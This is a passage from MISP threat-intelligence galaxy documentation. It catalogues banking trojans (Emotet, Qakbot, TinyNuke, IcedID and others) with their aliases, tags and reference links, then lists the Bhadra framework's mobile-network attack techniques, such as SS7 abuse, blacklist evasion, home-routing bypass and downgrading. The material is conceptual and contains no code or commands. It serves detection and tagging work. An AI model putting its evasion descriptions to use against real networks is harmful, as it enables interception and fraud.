  • similar: misp-galaxy:mitre-malware="Dyre - S0024" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"

Table 659. Table References

Links

https://www.secureworks.com/research/dyre-banking-trojan

https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

Tinba

Tinba is a very small banking trojan that hooks into browsers and steals login data and sniffs on network traffic. It also uses Man in The Browser (MiTB) and webinjects. Tinba is primarily delivered via exploit kits, malvertising and malspam email campaigns.

The tag is: misp-galaxy:banker="Tinba"

Tinba is also known as:

  • Zusy

  • TinyBanker

  • illi

Tinba has relationships with:

  • similar: misp-galaxy:tool="Tinba" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Tinba" with estimative-language:likelihood-probability="likely"

Table 660. Table References

Links

https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/

http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/

https://blog.avast.com/2014/09/15/tiny-banker-trojan-targets-customers-of-major-banks-worldwide/

http://my.infotex.com/tiny-banker-trojan/

Geodo

Geodo is a banking trojan delivered primarily through malspam emails. It is capable of sniffing network activity to steal information by hooking certain network API calls.

The tag is: misp-galaxy:banker="Geodo"

Geodo is also known as:

  • Feodo Version C

  • Emotet

Geodo has relationships with:

  • similar: misp-galaxy:tool="Emotet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 661. Table References

Links

https://feodotracker.abuse.ch/

http://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/

https://www.bleepingcomputer.com/news/security/emotet-banking-trojan-loves-usa-internet-providers/

https://www.bleepingcomputer.com/news/security/emotet-returns-with-thanksgiving-theme-and-better-phishing-tricks/

https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet

https://cofense.com/major-us-financial-institutions-imitated-advanced-geodo-emotet-phishing-lures-appear-authentic-containing-proofpoint-url-wrapped-links/

Feodo

Feodo is a banking trojan that utilizes web injects and is also capable of monitoring & manipulating cookies. Version A = Port 8080, Version B = Port 80. It is delivered primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Feodo"

Feodo is also known as:

  • Bugat

  • Cridex

Feodo has relationships with:

  • similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"

Table 662. Table References

Links

https://securelist.com/dridex-a-history-of-evolution/78531/

https://feodotracker.abuse.ch/

http://stopmalvertising.com/rootkits/analysis-of-cridex.html

Ramnit

Originally not a banking trojan in 2010, Ramnit became a banking trojan after the Zeus source code leak. It is capable of performing Man-in-the-Browser attacks. Distributed primarily via exploit kits.

The tag is: misp-galaxy:banker="Ramnit"

Ramnit is also known as:

  • Nimnul

Ramnit has relationships with:

  • similar: misp-galaxy:botnet="Ramnit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 663. Table References

Links

https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/

Qakbot

Qakbot is a banking trojan that leverages webinjects to steal banking information from victims. It also utilizes DGA for command and control. It is primarily delivered via exploit kits.

The tag is: misp-galaxy:banker="Qakbot"

Qakbot is also known as:

  • Qbot

  • Pinkslipbot

  • Akbot

Qakbot has relationships with:

  • similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

Table 664. Table References

Links

https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/

https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/

https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf

Corebot

Corebot is a modular trojan that leverages a banking module that can perform browser hooking, form grabbing, MitM, webinjection to steal financial information from victims. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Corebot"

Corebot has relationships with:

  • similar: misp-galaxy:malpedia="Corebot" with estimative-language:likelihood-probability="likely"

Table 665. Table References

Links

https://securityintelligence.com/an-overnight-sensation-corebot-returns-as-a-full-fledged-financial-malware/

https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf

https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/

TinyNuke

TinyNuke is a modular banking trojan that includes a HiddenDesktop/VNC server and reverse SOCKS 4 server. Its main functionality is to make web injections into specific pages to steal user data. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="TinyNuke"

TinyNuke is also known as:

  • NukeBot

  • Nuclear Bot

  • MicroBankingTrojan

  • Xbot

TinyNuke has relationships with:

  • similar: misp-galaxy:mitre-tool="Xbot - S0298" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 666. Table References

Links

https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/

https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/

https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596

https://benkowlab.blogspot.ca/2017/08/quick-look-at-another-alina-fork-xbot.html

Retefe

Retefe is a banking trojan that is distributed by what SWITCH CERT calls the Retefe gang or Operation Emmental. It uses geolocation based targeting. It also leverages fake root certificate and changes the DNS server for domain name resolution in order to display fake banking websites to victims. It is spread primarily through malspam emails.

The tag is: misp-galaxy:banker="Retefe"

Retefe is also known as:

  • Tsukuba

  • Werdlod

Retefe has relationships with:

  • similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 667. Table References

Links

https://www.govcert.admin.ch/blog/33/the-retefe-saga

https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/

https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/

https://securityblog.switch.ch/2014/11/05/retefe-with-a-new-twist/

http://securityintelligence.com/tsukuba-banking-trojan-phishing-in-japanese-waters/

ReactorBot

ReactorBot is sometimes mistakenly tagged as Rovnix. ReactorBot is a full fledged modular bot that includes a banking module that has roots with the Carberp banking trojan. Distributed primarily via malspam emails.

The tag is: misp-galaxy:banker="ReactorBot"

ReactorBot has relationships with:

  • similar: misp-galaxy:malpedia="ReactorBot" with estimative-language:likelihood-probability="likely"

Table 668. Table References

Links

http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html

https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under

http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html

http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Matrix Banker

Matrix Banker is named accordingly because of the Matrix reference in its C2 panel. Distributed primarily via malspam emails.

The tag is: misp-galaxy:banker="Matrix Banker"

Matrix Banker has relationships with:

  • similar: misp-galaxy:malpedia="Matrix Banker" with estimative-language:likelihood-probability="likely"

Table 669. Table References

Links

https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/

Zeus Gameover

Zeus Gameover captures banking credentials from infected computers, then uses those credentials to initiate or re-direct wire transfers to accounts overseas that are controlled by the criminals. GameOver has a decentralized, peer-to-peer command and control infrastructure rather than centralized points of origin. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Zeus Gameover"

Table 670. Table References

Links

https://heimdalsecurity.com/blog/zeus-gameover/

https://www.us-cert.gov/ncas/alerts/TA14-150A

SpyEye

SpyEye is a banking trojan similar to the Zeus botnet. It utilizes a web control panel for C2 and can perform form grabbing, autofill credit card modules, FTP grabber, POP3 grabber and HTTP basic access authorization grabber. It also contained a Kill Zeus feature which would remove any Zeus infections if SpyEye was on the system. Distributed primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="SpyEye"

Table 671. Table References

Links

https://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf

https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html

https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot

Citadel

Citadel is an offspring of the Zeus banking trojan. Delivered primarily via exploit kits.

The tag is: misp-galaxy:banker="Citadel"

Citadel has relationships with:

  • similar: misp-galaxy:malpedia="Citadel" with estimative-language:likelihood-probability="likely"

Table 672. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/

https://krebsonsecurity.com/tag/citadel-trojan/

https://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/

Atmos

Atmos is derived from the Citadel banking trojan. Delivered primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Atmos"

Table 673. Table References

Links

https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/

http://www.xylibox.com/2016/02/citadel-0011-atmos.html

Ice IX

Ice IX is a bot created using the source code of ZeuS 2.0.8.9. No major improvements compared to ZeuS 2.0.8.9.

The tag is: misp-galaxy:banker="Ice IX"

Ice IX has relationships with:

  • similar: misp-galaxy:malpedia="Ice IX" with estimative-language:likelihood-probability="likely"

Table 674. Table References

Links

https://securelist.com/ice-ix-not-cool-at-all/29111/

Zitmo

Zeus in the mobile. Banking trojan developed for mobile devices such as Windows Mobile, Blackberry and Android.

The tag is: misp-galaxy:banker="Zitmo"

Table 675. Table References

Links

https://securelist.com/zeus-in-the-mobile-for-android-10/29258/

Licat

Banking trojan based on Zeus V2. Murofet is a newer version of Licat found around the end of 2011.

The tag is: misp-galaxy:banker="Licat"

Licat is also known as:

  • Murofet

Licat has relationships with:

  • similar: misp-galaxy:malpedia="Murofet" with estimative-language:likelihood-probability="likely"

Table 676. Table References

Links

https://johannesbader.ch/2015/09/three-variants-of-murofets-dga/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_LICAT.A

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus%3aWin32%2fMurofet.A

Skynet

Skynet is a Tor-powered trojan with DDoS, Bitcoin mining and Banking capabilities. Spread via USENET as per rapid7.

The tag is: misp-galaxy:banker="Skynet"

Table 677. Table References

Links

https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/

IcedID

According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. are also on the target list the malware fetches.

The tag is: misp-galaxy:banker="IcedID"

IcedID is also known as:

  • BokBot

IcedID has relationships with:

  • similar: misp-galaxy:malpedia="IcedID" with estimative-language:likelihood-probability="likely"

Table 678. Table References

Links

https://www.bleepingcomputer.com/news/security/new-icedid-banking-trojan-discovered/

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

http://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

GratefulPOS

GratefulPOS has the following functions:

  • Access arbitrary processes on the target POS system

  • Scrape track 1 and 2 payment card data from the process(es)

  • Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomali in analysis of a precursor to this sample.

The tag is: misp-galaxy:banker="GratefulPOS"

GratefulPOS has relationships with:

  • similar: misp-galaxy:tool="GratefulPOS" with estimative-language:likelihood-probability="likely"

Table 679. Table References

Links

https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

Dok

A macOS banking trojan that redirects an infected user’s web traffic in order to extract banking credentials.

The tag is: misp-galaxy:banker="Dok"

Dok has relationships with:

  • similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 680. Table References

Links

https://objective-see.com/blog/blog_0x25.html#Dok

downAndExec

Services like Netflix use content delivery networks (CDNs) to maximize bandwidth usage as it gives users greater speed when viewing the content, as the server is close to them and is part of the Netflix CDN. This results in faster loading times for series and movies, wherever you are in the world. But, apparently, the CDNs are starting to become a new way of spreading malware. The attack chain is very extensive, and incorporates the execution of remote scripts (similar in some respects to the recent “fileless” banking malware trend), plus the use of CDNs for command and control (C&C), and other standard techniques for the execution and protection of malware.

The tag is: misp-galaxy:banker="downAndExec"

Table 681. Table References

Links

https://www.welivesecurity.com/2017/09/13/downandexec-banking-malware-cdns-brazil/

Smominru

Since the end of May 2017, we have been monitoring a Monero miner that spreads using the EternalBlue Exploit (CVE-2017-0144). The miner itself, known as Smominru (aka Ismo) has been well-documented, so we will not discuss its post-infection behavior. However, the miner’s use of Windows Management Infrastructure is unusual among coin mining malware. The speed at which mining operations conduct mathematical operations to unlock new units of cryptocurrency is referred to as “hash power”. Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz. The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week.

The tag is: misp-galaxy:banker="Smominru"

Smominru is also known as:

  • Ismo

  • lsmo

Smominru has relationships with:

  • similar: misp-galaxy:malpedia="Smominru" with estimative-language:likelihood-probability="likely"

Table 682. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators

DanaBot

It’s a Trojan that includes banking site web injections and stealer functions. It consists of a downloader component that downloads an encrypted file containing the main DLL. The DLL, in turn, connects using raw TCP connections to port 443 and downloads additional modules (i.e. VNCDLL.dll, StealerDLL.dll, ProxyDLL.dll).

The tag is: misp-galaxy:banker="DanaBot"

DanaBot has relationships with:

  • similar: misp-galaxy:malpedia="DanaBot" with estimative-language:likelihood-probability="likely"

Table 683. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0

https://www.bleepingcomputer.com/news/security/danabot-banking-malware-now-targeting-banks-in-the-us/

Backswap

The banker is distributed through malicious email spam campaigns. Instead of using complex process injection methods to monitor browsing activity, the malware hooks key Windows message loop events in order to inspect values of the window objects for banking activity. The payload is delivered as a modified version of a legitimate application that is partially overwritten by the malicious payload.

The tag is: misp-galaxy:banker="Backswap"

Table 684. Table References

Links

https://www.cert.pl/news/single/analiza-zlosliwego-oprogramowania-backswap/

https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/

Bebloh

The tag is: misp-galaxy:banker="Bebloh"

Bebloh is also known as:

  • URLZone

  • Shiotob

Bebloh has relationships with:

  • similar: misp-galaxy:malpedia="UrlZone" with estimative-language:likelihood-probability="likely"

Table 685. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Bebloh.A

https://www.symantec.com/security-center/writeup/2011-041411-0912-99

Banjori

The tag is: misp-galaxy:banker="Banjori"

Banjori is also known as:

  • MultiBanker 2

  • BankPatch

  • BackPatcher

Banjori has relationships with:

  • similar: misp-galaxy:malpedia="Banjori" with estimative-language:likelihood-probability="likely"

Table 686. Table References

Links

https://www.johannesbader.ch/2015/02/the-dga-of-banjori/

Qadars

The tag is: misp-galaxy:banker="Qadars"

Qadars has relationships with:

  • similar: misp-galaxy:malpedia="Qadars" with estimative-language:likelihood-probability="likely"

Table 687. Table References

Links

https://www.countercept.com/our-thinking/decrypting-qadars-banking-trojan-c2-traffic/

Sisron

The tag is: misp-galaxy:banker="Sisron"

Table 688. Table References

Links

https://www.johannesbader.ch/2016/06/the-dga-of-sisron/

Ranbyus

The tag is: misp-galaxy:banker="Ranbyus"

Ranbyus has relationships with:

  • similar: misp-galaxy:malpedia="Ranbyus" with estimative-language:likelihood-probability="likely"

Table 689. Table References

Links

https://www.johannesbader.ch/2016/06/the-dga-of-sisron/

Fobber

The tag is: misp-galaxy:banker="Fobber"

Fobber has relationships with:

  • similar: misp-galaxy:malpedia="Fobber" with estimative-language:likelihood-probability="likely"

Table 690. Table References

Links

https://searchfinancialsecurity.techtarget.com/news/4500249201/Fobber-Drive-by-financial-malware-returns-with-new-tricks

Karius

Trojan under development and already being distributed through the RIG Exploit Kit. Observed code similarities with other well-known bankers such as Ramnit, Vawtrak and TrickBot. Karius works in a fashion similar to other traditional banking malware and consists of three components (injector32\64.exe, proxy32\64.dll and mod32\64.dll); these components work together to deploy webinjects in several browsers.

The tag is: misp-galaxy:banker="Karius"

Karius has relationships with:

  • similar: misp-galaxy:malpedia="Karius" with estimative-language:likelihood-probability="likely"

Table 691. Table References

Links

https://research.checkpoint.com/banking-trojans-development/

Kronos

Kronos was a type of banking malware first reported in 2014. It was sold for $7000. As of September 2015, a renewed version was reconnecting with infected bots and sending them a brand new configuration file against U.K. banks and one bank in India. Similar to Zeus, it was focused on stealing banking login credentials from browser sessions. A new version of this malware appears to have been used in 2018; the main difference is that the 2018 edition uses Tor-hosted C&C control panels.

The tag is: misp-galaxy:banker="Kronos"

Kronos has relationships with:

  • similar: misp-galaxy:malpedia="Kronos" with estimative-language:likelihood-probability="likely"

Table 692. Table References

Links

https://en.wikipedia.org/wiki/Kronos_(malware)

https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware

https://www.bleepingcomputer.com/news/security/new-version-of-the-kronos-banking-trojan-discovered/

CamuBot

A newly discovered banking Trojan departs from the regular tactics observed by malware researchers by choosing visible installation and by adding social engineering components. CamuBot appeared last month in Brazil targeting companies and organizations from the public sector. The victim is the one installing the malware, at the instructions of a human operator that pretends to be a bank employee.

The tag is: misp-galaxy:banker="CamuBot"

CamuBot has relationships with:

  • similar: misp-galaxy:malpedia="CamuBot" with estimative-language:likelihood-probability="likely"

Table 693. Table References

Links

https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/

Dark Tequila

Dark Tequila has primarily been designed to steal victims’ financial information from a long list of online banking sites, as well as login credentials to popular websites, ranging from code versioning repositories to public file storage accounts and domain registrars.

The tag is: misp-galaxy:banker="Dark Tequila"

Table 694. Table References

Links

https://thehackernews.com/2018/08/mexico-banking-malware.html

Malteiro

Distributed by Malteiro

The tag is: misp-galaxy:banker="Malteiro"

Malteiro is also known as:

  • URSA

Malteiro has relationships with:

  • delivered-by: misp-galaxy:threat-actor="Malteiro" with estimative-language:likelihood-probability="likely"

Table 695. Table References

Links

https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/

Bhadra Framework

Bhadra Threat Modeling Framework.

Bhadra Framework is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Siddharth Prakash Rao - Silke Holtmanns - Tuomas Aura

Attacks from UE

"Attacks from UE" refers to any technique that involves the attacks launched by the software or hardware components of the user equipment to send malicious traffic into the mobile network.

The tag is: misp-galaxy:bhadra-framework="Attacks from UE"

SIM-based attacks

The "SIM-based attacks" are the techniques that involve any physical smart cards, namely SIM from 2G, USIM from 3G, and UICC from 4G networks.

The tag is: misp-galaxy:bhadra-framework="SIM-based attacks"

Attacks from radio access network

The "attacks from radio access network" are the techniques where an adversary with radio capabilities impersonates the mobile network to the UE (or vice versa) and becomes a man-in-the-middle.

The tag is: misp-galaxy:bhadra-framework="Attacks from radio access network"

Attacks from other mobile network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes.

The tag is: misp-galaxy:bhadra-framework="Attacks from other mobile network"

Attacks with access to transport network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes.

The tag is: misp-galaxy:bhadra-framework="Attacks with access to transport network"

Attacks from IP-based network

The "attacks from IP-based network" techniques are mostly launched from the service and application network, which allows non-operator entities to infuse malicious traffic into an operator’s network.

The tag is: misp-galaxy:bhadra-framework="Attacks from IP-based network"

Insider attacks and human errors

The "insider attacks and human errors" techniques involve the intentional attacks and unintentional mistakes of human insiders with access to any component of the mobile communication ecosystem.

The tag is: misp-galaxy:bhadra-framework="Insider attacks and human errors"

Infecting UE hardware or software

Retaining the foothold gained on the target system through the initial access by infecting UE hardware or software.

The tag is: misp-galaxy:bhadra-framework="Infecting UE hardware or software"

Infecting SIM cards

Retaining the foothold gained on the target system through the initial access by infecting SIM cards.

The tag is: misp-galaxy:bhadra-framework="Infecting SIM cards"

Spoofed radio network

Retaining the foothold gained on the target system through the initial access by radio network spoofing.

The tag is: misp-galaxy:bhadra-framework="Spoofed radio network"

Infecting network nodes

Retaining the foothold gained on the target system through the initial access by infecting network nodes.

The tag is: misp-galaxy:bhadra-framework="Infecting network nodes"

Covert channels

Retaining the foothold gained on the target system through the initial access via covert channels.

The tag is: misp-galaxy:bhadra-framework="Covert channels"

Port scanning or sweeping

"Port scanning or sweeping" techniques to probe servers or hosts with open ports.

The tag is: misp-galaxy:bhadra-framework="Port scanning or sweeping"

Perimeter mapping

"Perimeter mapping" techniques use command-line utilities (e.g., nmap and whois), web-based lookup tools and official APIs provided by the Internet registrars that assign the ASNs, drawing on a wide range of publicly available sources.

The tag is: misp-galaxy:bhadra-framework="Perimeter mapping"

Threat intelligence gathering

"Threat intelligence gathering" using dedicated search engines (such as Censys, Shodan) to gather information about vulnerable devices or networks, or using advanced search options of traditional search engines.

The tag is: misp-galaxy:bhadra-framework="Threat intelligence gathering"

CN-specific scanning

"CN-specific scanning", used to scan nodes that are interconnected with protocols specific to the mobile communication domain (GTP, SCTP).

The tag is: misp-galaxy:bhadra-framework="CN-specific scanning"

Internal resource search

"Internal resource search" refers to an insider with access to provider internal databases abusing the information as a discovery tactic.

The tag is: misp-galaxy:bhadra-framework="Internal resource search"

UE knocking

"UE knocking" refers to the technique that scans User Equipment, similarly to how IP endpoints and core network nodes are scanned or mapped.

The tag is: misp-galaxy:bhadra-framework="UE knocking"

Exploit roaming agreements

"Exploit roaming agreements" is a technique exploited by evil mobile operators. Although communication between operators depends on a roaming agreement being in place, an attacker that has gained a foothold with one operator can abuse the roaming agreements in place for lateral movement to all adjacent operators with agreements in place.

The tag is: misp-galaxy:bhadra-framework="Exploit roaming agreements"

Abusing interworking functionalities

"Abusing interworking functionalities" is a technique for adversaries to move laterally between networks of different generations.

The tag is: misp-galaxy:bhadra-framework="Abusing interworking functionalities"

Exploit platform & service-specific vulnerabilities

Once an attacker has gained a foothold in an operator, it can conduct privilege escalation and process injection for gaining administrative rights, password cracking of valid user accounts on the nodes, exploit vulnerabilities in databases and file systems, and take advantage of improper configurations of routers and switches.

The tag is: misp-galaxy:bhadra-framework="Exploit platform & service-specific vulnerabilities"

SS7-based-attacks

Attacks abusing the SS7 protocol.

The tag is: misp-galaxy:bhadra-framework="SS7-based-attacks"

Diameter-based attacks

Attacks abusing the Diameter protocol.

The tag is: misp-galaxy:bhadra-framework="Diameter-based attacks"

GTP-based attacks

Attacks abusing the GTP protocol.

The tag is: misp-galaxy:bhadra-framework="GTP-based attacks"

DNS-based attacks

DNS based attacks.

The tag is: misp-galaxy:bhadra-framework="DNS-based attacks"

Pre-AKA attacks

Attack techniques that take place during the unencrypted communication that occurs prior to the AKA protocol.

The tag is: misp-galaxy:bhadra-framework="Pre-AKA attacks"

Security audit camouflage

The operating systems, software, and services used on the network nodes are prone to security vulnerabilities and installation of unwanted malware. Although operators conduct routine security audits to track and patch the vulnerabilities or remove the malware from the infected nodes, their effectiveness is not known to the public. Any means by which an adversary can remain undetected from such audits are referred to as the security audit camouflage technique.

The tag is: misp-galaxy:bhadra-framework="Security audit camouflage"

Blacklist evasion

Mobile operators employ several defenses in terms of securing their network traffic. For instance, operators maintain a whitelist of IPs and GTs of nodes from their own infrastructure and their partner operators (as agreed in IR 21), and only traffic from these nodes is processed. Similarly, a blacklist is also maintained to control spam due to configuration errors and malicious traffic. Anything from the blacklist is banned from entering the operator’s network. Such defense mechanisms may defend against unsolicited traffic from external networks (e.g., from the public Internet and SAN), but they barely serve their purpose in the case of attacks from inter-operator communications. Since most of the communication protocols are unauthenticated in nature, an attacker with knowledge of identifiers of the allowed nodes (i.e. gained during the discovery phase) can impersonate their identity. We call it the blacklist evasion technique.

The tag is: misp-galaxy:bhadra-framework="Blacklist evasion"

Middlebox misconfiguration exploits

NAT middleboxes are used for separating the private networks of mobile operators from the public Internet and work as a second line of defense. However, studies have shown that the middleboxes deployed by operators are prone to misconfigurations that allow adversaries to infiltrate malicious traffic into mobile networks, e.g., by spoofing the IP headers. Some of the other NAT vulnerabilities lie in IPv4-to-IPv6 address mapping logic, which can be exploited by adversaries to exhaust the resources, wipe out the mapping, or to assist with blacklist evasion. Adversaries use such middlebox misconfiguration exploit techniques to launch denial-of-service or over-billing attacks.

The tag is: misp-galaxy:bhadra-framework="Middlebox misconfiguration exploits"

Bypass Firewall

Adversaries (e.g., evil operators) can for example exploit the implicit trust between roaming partners as a bypass firewall technique.

The tag is: misp-galaxy:bhadra-framework="Bypass Firewall"

Bypass homerouting

SMS home routing is a defense mechanism, where an additional SMS router intervenes in external location queries for SMS deliveries, and the roaming network takes the responsibility of delivering the SMS without providing location information to the external entity. Although many operators have implemented SMS home routing solutions, there are no silver bullets. If the SMS routers are incorrectly configured, adversaries can hide SMS delivery location queries within other messages so that the SMS home router fails to process them. We refer to it as the bypass home routing technique.

The tag is: misp-galaxy:bhadra-framework="Bypass homerouting"

Downgrading

Attacks on the radio access networks are well-studied and newer generations are designed to address the weaknesses in previous generations. Usage of weak cryptographic primitives, lack of integrity protection of the radio channels, and one-sided authentication (only from the network) remain problems mostly of GSM-only radio communication. So, radio link attackers use downgrading as an attack technique to block service over newer generations and accept to serve only in the GSM radio network. The downgrading technique works similarly in the core network, where the adversary accepts to serve only in SS7-based signaling instead of Diameter-based signaling. Using interworking functions for inter-generation communication translation could make the downgrading attacks much easier.

The tag is: misp-galaxy:bhadra-framework="Downgrading"

Redirection

Redirection technique is a variant of the downgrading technique, where an adversary forcefully routes the traffic through networks or components that are under its control. By redirecting traffic to an unsafe network, the adversary can intercept mobile communication (e.g., calls and SMS) on the RAN part. Redirection attacks on the core network result in not only communication interception, but also in billing discrepancies, as an adversary can route the calls of a mobile user from its home network through a foreign network on a higher call rate.

The tag is: misp-galaxy:bhadra-framework="Redirection"

UE Protection evasion

Protection on the UE is mainly available in the form of antivirus apps as a defense against viruses and malware that steals sensitive information (e.g., banking credentials and user passwords) or track user activities. Simple visual cues on UE (such as notifications) could also be a protection mechanism by itself. Unfortunately, mobile network-based attacks cannot be detected or defended effectively from UE’s side by traditional antivirus apps, and such attacks do not trigger any visual signs. Although there are attempts for defending against radio link attacks, including citywide studies to detect IMSI catchers, their effectiveness is still under debate. Similarly, there are recent attempts to detect signaling attacks using distance bounding protocol run from a UE. However, such solutions are still in the research phase, and their effectiveness on a large scale is still untested. To this end, the absence of robust detection and defense mechanisms on the UE is, in fact, an evasion mechanism for an adversary. We refer to them as UE protection evasion techniques.

The tag is: misp-galaxy:bhadra-framework="UE Protection evasion"

Admin credentials

Stealing legitimate admin credentials for critical nodes is beneficial for the adversary to increase its chances of persistence to the target or masquerade its activities.

The tag is: misp-galaxy:bhadra-framework="Admin credentials"

User-specific identifiers

User-specific identifiers such as IMSI and IMEI are an indicator of who owns a UE with a specific subscription and where a UE is located physically. Since mobile users always keep their mobile phones physically near them, an adversary with the knowledge of these permanent identifiers will be able to determine whether or not a user is in a specific location. On the other hand, temporary identifiers (e.g., TMSI and GUTI) are used to reduce the usage of permanent identifiers like IMSI over radio channels. Although the temporary identifiers are supposed to change frequently and are expected to live for a short period, research has shown that this is not the case.

The tag is: misp-galaxy:bhadra-framework="User-specific identifiers"

User-specific data

Adversaries can collect several types of user-specific data, such as the content of SMS and calls, location dumps from base stations, call and billing records, and browsing-related data (such as DNS queries and unencrypted browsing sessions).

The tag is: misp-galaxy:bhadra-framework="User-specific data"

Network-specific identifiers

Adversaries aim to collect network-specific identifiers such as GTs and IPs of critical nodes and the Tunnel Endpoint Identifier (TEID) of GTP tunnels from operators’ networks.

The tag is: misp-galaxy:bhadra-framework="Network-specific identifiers"

Network-specific data

Adversaries may also be interested in network-specific data that are obtained mainly during the execution of discovery tactics. Such data includes, e.g., the network topology, the trust relationship between different nodes, routing metadata, and sensitive documents.

The tag is: misp-galaxy:bhadra-framework="Network-specific data"

Location tracking

Attacker is able to track the location of the target end-user.

The tag is: misp-galaxy:bhadra-framework="Location tracking"

Calls eavesdropping

Attacker is able to eavesdrop on calls.

The tag is: misp-galaxy:bhadra-framework="Calls eavesdropping"

SMS interception

Attacker is able to intercept SMS messages.

The tag is: misp-galaxy:bhadra-framework="SMS interception"

Data interception

Attacker is able to intercept or modify internet traffic.

The tag is: misp-galaxy:bhadra-framework="Data interception"

Billing frauds

Billing frauds refer to various types of attacks where an adversary causes financial discrepancies for operators.

The tag is: misp-galaxy:bhadra-framework="Billing frauds"

DoS - network

